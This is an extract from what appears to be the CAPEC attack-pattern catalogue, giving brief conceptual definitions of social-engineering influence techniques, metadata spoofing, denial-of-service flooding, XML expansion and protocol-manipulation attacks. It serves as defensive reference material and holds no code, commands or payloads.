1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 417 (Influence Perception) > 422 (Influence Perception of Commitment and Consistency)

An adversary uses social engineering to convince the target to do minor tasks as opposed to larger actions. After complying with a request, individuals are more likely to agree to subsequent requests that are similar in type and required effort.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 417 (Influence Perception) > 423 (Influence Perception of Liking)

The adversary influences the target's actions by building a relationship where the target has a liking to the adversary. People are more likely to be influenced by people of whom they are fond, so the adversary attempts to ingratiate themself with the target via actions, appearance, or a combination thereof.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 417 (Influence Perception) > 424 (Influence Perception of Consensus or Social Proof)

The adversary influences the target's actions by leveraging the inherent human nature to assume behavior of others is appropriate. In situations of uncertainty, people tend to behave in ways they see others behaving. The adversary convinces the target of adopting behavior or actions that is advantageous to the adversary.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 425 (Target Influence via Framing)

An adversary uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the adversary's point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the adversary's perspective. One technique of framing is to avoid the use of the word "No" and to contextualize responses in a manner that is positive. When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the adversary.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 426 (Influence via Incentives)

The adversary incites a behavior from the target by manipulating something of influence. This is commonly associated with financial, social, or ideological incentivization. Examples include monetary fraud, peer pressure, and preying on the target's morals or ethics. The most effective incentive against one target might not be as effective against another, therefore the adversary must gather information about the target's vulnerability to particular incentives.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 427 (Influence via Psychological Principles)

The adversary shapes the target's actions or behavior by focusing on the ways human interact and learn, leveraging such elements as cognitive and social psychology. In a variety of ways, a target can be influenced to behave or perform an action through capitalizing on what scholarship and research has learned about how and why humans react to specific scenarios and cues.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 427 (Influence via Psychological Principles) > 428 (Influence via Modes of Thinking)

The adversary tailors their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the adversary has adapted their communication forms to match those of the target. When skillfully employed, the target is likely to be unaware that they are being manipulated.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 427 (Influence via Psychological Principles) > 429 (Target Influence via Eye Cues)

The adversary gains information via non-verbal means from the target through eye movements.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 427 (Influence via Psychological Principles) > 433 (Target Influence via The Human Buffer Overflow)

An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 427 (Influence via Psychological Principles) > 434 (Target Influence via Interview and Interrogation)

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 416 (Manipulate Human Behavior) > 427 (Influence via Psychological Principles) > 435 (Target Influence via Instant Rapport)

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 690 (Metadata Spoofing)

An adversary alters the metadata of a resource (e.g., file, directory, repository, etc.) to present a malicious resource as legitimate/credible.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 690 (Metadata Spoofing) > 691 (Spoof Open-Source Software Metadata)

An adversary spoofs open-source software metadata in an attempt to masquerade malicious software as popular, maintained, and trusted.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 690 (Metadata Spoofing) > 691 (Spoof Open-Source Software Metadata) > 692 (Spoof Version Control System Commit Metadata)

An adversary spoofs metadata pertaining to a Version Control System (VCS) (e.g., Git) repository's commits to deceive users into believing that the maliciously provided software is frequently maintained and originates from a trusted source.

1000 (Mechanisms of Attack) > 156 (Engage in Deceptive Interactions) > 690 (Metadata Spoofing) > 691 (Spoof Open-Source Software Metadata) > 693 (StarJacking)

An adversary spoofs software popularity metadata to deceive users into believing that a maliciously provided package is widely used and originates from a trusted source.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality)

An adversary uses or manipulates one or more functions of an application in order to achieve a malicious objective not originally intended by the application, or to deplete a resource to the point that the target's functionality is affected. This is a broad class of attacks wherein the adversary is able to alter the intended result or purpose of the functionality and thereby affect application behavior or information integrity. Outcomes can range from information exposure, vandalism, degrading or denial of service, as well as execution of arbitrary code on the target machine.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 113 (Interface Manipulation)

An adversary manipulates the use or processing of an interface (e.g. Application Programming Interface (API) or System-on-Chip (SoC)) resulting in an adverse impact upon the security of the system implementing the interface. This can allow the adversary to bypass access control and/or execute functionality not intended by the interface implementation, possibly compromising the system which integrates the interface. Interface manipulation can take on a number of forms including forcing the unexpected use of an interface or the use of an interface in an unintended way.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 113 (Interface Manipulation) > 121 (Exploit Non-Production Interfaces)

An adversary exploits a sample, demonstration, test, or debug interface that is unintentionally enabled on a production system, with the goal of gleaning information or leveraging functionality that would otherwise be unavailable.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 113 (Interface Manipulation) > 121 (Exploit Non-Production Interfaces) > 661 (Root/Jailbreak Detection Evasion via Debugging)

An adversary inserts a debugger into the program entry point of a mobile application to modify the application binary, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Rooting/Jailbreaking a mobile device also provides users with access to system debuggers and disassemblers, which can be leveraged to exploit applications by dumping the application's memory at runtime in order to remove or bypass signature verification methods. This further allows the adversary to evade Root/Jailbreak detection mechanisms, which can result in execution of administrative commands, obtaining confidential data, impersonating legitimate users of the application, and more.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 113 (Interface Manipulation) > 133 (Try All Common Switches)

An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is indiscriminately attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 113 (Interface Manipulation) > 160 (Exploit Script-Based APIs)

Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support <script> tags that allow scripting languages to be embedded in the page and then interpreted by the receiving web browser. If the content provider is malicious, these scripts can compromise the client application. Some applications may even execute the scripts under their own identity (rather than the identity of the user providing the script) which can allow attackers to perform activities that would otherwise be denied to them.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 113 (Interface Manipulation) > 36 (Using Unpublished Interfaces or Functionality)

An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding)

An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding) > 482 (TCP Flood)

An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. This often involves the use of TCP SYN messages.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding) > 486 (UDP Flood)

An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding) > 487 (ICMP Flood)

An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding) > 488 (HTTP Flood)

An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server's resources. Since these are legitimate sessions this attack is very difficult to detect.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding) > 489 (SSL Flood)

An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding) > 490 (Amplification)

An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding) > 528 (XML Flood)

An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing.XML Denial of Service (XML DoS)

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding) > 528 (XML Flood) > 147 (XML Ping of the Death)

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 125 (Flooding) > 666 (BlueSmacking)

An adversary uses Bluetooth flooding to transfer large packets to Bluetooth enabled devices over the L2CAP protocol with the goal of creating a DoS. This attack must be carried out within close proximity to a Bluetooth enabled device.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation)

An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 230 (Serialized Data with Nested Payloads)

Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.XML Denial of Service (XML DoS)

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 230 (Serialized Data with Nested Payloads) > 197 (Exponential Data Expansion)

An adversary submits data to a target application which contains nested exponential data expansion to produce excessively large output. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.Billion Laughs AttackXML BombXML Entity Expansion (XEE)

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 230 (Serialized Data with Nested Payloads) > 491 (Quadratic Data Expansion)

An adversary exploits macro-like substitution to cause a denial of service situation due to excessive memory being allocated to fully expand the data. The result of this denial of service could cause the application to freeze or crash. This involves defining a very large entity and using it multiple times in a single entity substitution. CAPEC-197 is a similar attack pattern, but it is easier to discover and defend against. This attack pattern does not perform multi-level substitution and therefore does not obviously appear to consume extensive resources.XML Entity Expansion (XEE)

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 231 (Oversized Serialized Data Payloads)

An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.XML Denial of Service (XML DoS)

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 231 (Oversized Serialized Data Payloads) > 221 (Data Serialization External Entities Blowup)

This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 231 (Oversized Serialized Data Payloads) > 229 (Serialized Data Parameter Blowup)

This attack exploits certain serialized data parsers (e.g., XML, YAML, etc.) which manage data in an inefficient manner. The attacker crafts an serialized data file with multiple configuration parameters in the same dataset. In a vulnerable parser, this results in a denial of service condition where CPU resources are exhausted because of the parsing algorithm. The weakness being exploited is tied to parser implementation and not language specific.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 492 (Regular Expression Exponential Blowup)

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 493 (SOAP Array Blowup)

An adversary may execute an attack on a web service that uses SOAP messages in communication. By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 494 (TCP Fragmentation)

An adversary may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules of network controls, by attempting to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 495 (UDP Fragmentation)

An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 130 (Excessive Allocation) > 496 (ICMP Fragmentation)

An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 131 (Resource Leak Exposure)

An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 212 (Functionality Misuse)

An adversary leverages a legitimate capability of an application in such a way as to achieve a negative technical impact. The system functionality is not altered or modified but used in a way that was not intended. This is often accomplished through the overuse of a specific functionality or by leveraging functionality with design flaws that enables the adversary to gain access to unauthorized, sensitive data.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 212 (Functionality Misuse) > 111 (JSON Hijacking (aka JavaScript Hijacking))

An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 212 (Functionality Misuse) > 2 (Inducing Account Lockout)

An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 212 (Functionality Misuse) > 48 (Passing Local Filenames to Functions That Expect a URL)

This attack relies on client side code to access local files and resources instead of URLs. When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser's authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 212 (Functionality Misuse) > 50 (Password Recovery Exploitation)

An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 212 (Functionality Misuse) > 620 (Drop Encryption Level)

An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 212 (Functionality Misuse) > 620 (Drop Encryption Level) > 606 (Weakening of Cellular Encryption)

An attacker, with control of a Cellular Rogue Base Station or through cooperation with a Malicious Mobile Network Operator can force the mobile device (e.g., the retransmission device) to use no encryption (A5/0 mode) or to use easily breakable encryption (A5/1 or A5/2 mode).

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 212 (Functionality Misuse) > 682 (Exploitation of Firmware or ROM Code with Unpatchable Vulnerabilities)

An adversary may exploit vulnerable code (i.e., firmware or ROM) that is unpatchable. Unpatchable devices exist due to manufacturers intentionally or inadvertently designing devices incapable of updating their software. Additionally, with updatable devices, the manufacturer may decide not to support the device and stop making updates to their software.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 216 (Communication Channel Manipulation)

An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 216 (Communication Channel Manipulation) > 12 (Choosing Message Identifier)

This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 216 (Communication Channel Manipulation) > 217 (Exploiting Incorrectly Configured SSL/TLS)

An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 227 (Sustained Client Engagement)

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 227 (Sustained Client Engagement) > 469 (HTTP DoS)

An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker's responses on the initiated HTTP sessions while the connection threads are being exhausted.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation)

An adversary subverts a communications protocol to perform an attack. This type of attack can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 220 (Client-Server Protocol Manipulation)

An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 220 (Client-Server Protocol Manipulation) > 105 (HTTP Request Splitting)

An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server). See CanPrecede relationships for possible consequences.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 220 (Client-Server Protocol Manipulation) > 273 (HTTP Response Smuggling)

An adversary manipulates and injects malicious content in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., server). See CanPrecede relationships for possible consequences. HTTP Desync

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 220 (Client-Server Protocol Manipulation) > 274 (HTTP Verb Tampering)

An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 220 (Client-Server Protocol Manipulation) > 33 (HTTP Request Smuggling)

An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages using various HTTP headers, request-line and body parameters as well as message sizes (denoted by the end of message signaled by a given HTTP header) by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to secretly send unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server). See CanPrecede relationships for possible consequences. HTTP Desync

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 220 (Client-Server Protocol Manipulation) > 34 (HTTP Response Splitting)

An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site. See CanPrecede relationships for possible consequences.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 220 (Client-Server Protocol Manipulation) > 5 (Blue Boxing)

This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions. This attack pattern is included in CAPEC for historical purposes.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 276 (Inter-component Protocol Manipulation)

Inter-component protocols are used to communicate between different software and hardware modules within a single computer. Common examples are: interrupt signals and data pipes. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 276 (Inter-component Protocol Manipulation) > 665 (Exploitation of Thunderbolt Protection Flaws)

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 277 (Data Interchange Protocol Manipulation)

Data Interchange Protocols are used to transmit structured data between entities. These protocols are often specific to a particular domain (B2B: purchase orders, invoices, transport logistics and waybills, medical records). They are often, but not always, XML-based. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 278 (Web Services Protocol Manipulation)

An adversary manipulates a web service related protocol to cause a web application or service to react differently than intended. This can either be performed through the manipulation of call parameters to include unexpected values, or by changing the called function to one that should normally be restricted or limited. By leveraging this pattern of attack, the adversary is able to gain access to data or resources normally restricted, or to cause the application or service to crash.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 278 (Web Services Protocol Manipulation) > 201 (Serialized Data External Linking)

An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 278 (Web Services Protocol Manipulation) > 221 (Data Serialization External Entities Blowup)

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 278 (Web Services Protocol Manipulation) > 279 (SOAP Manipulation)

Simple Object Access Protocol (SOAP) is used as a communication protocol between a client and server to invoke web services on the server. It is an XML-based protocol, and therefore suffers from many of the same shortcomings as other XML-based protocols. Adversaries can make use of these shortcomings and manipulate the content of SOAP paramters, leading to undesirable behavior on the server and allowing the adversary to carry out a number of further attacks.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 272 (Protocol Manipulation) > 90 (Reflection Attack in Authentication Protocol)

An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.

1000 (Mechanisms of Attack) > 210 (Abuse Existing Functionality) > 554 (Functionality Bypass)

An adversary attacks a system by bypassing some or all functionality intended to protect it. Often, a system user will think that protection is in place, but the functionality behind those protections has been disabled by the adversary.

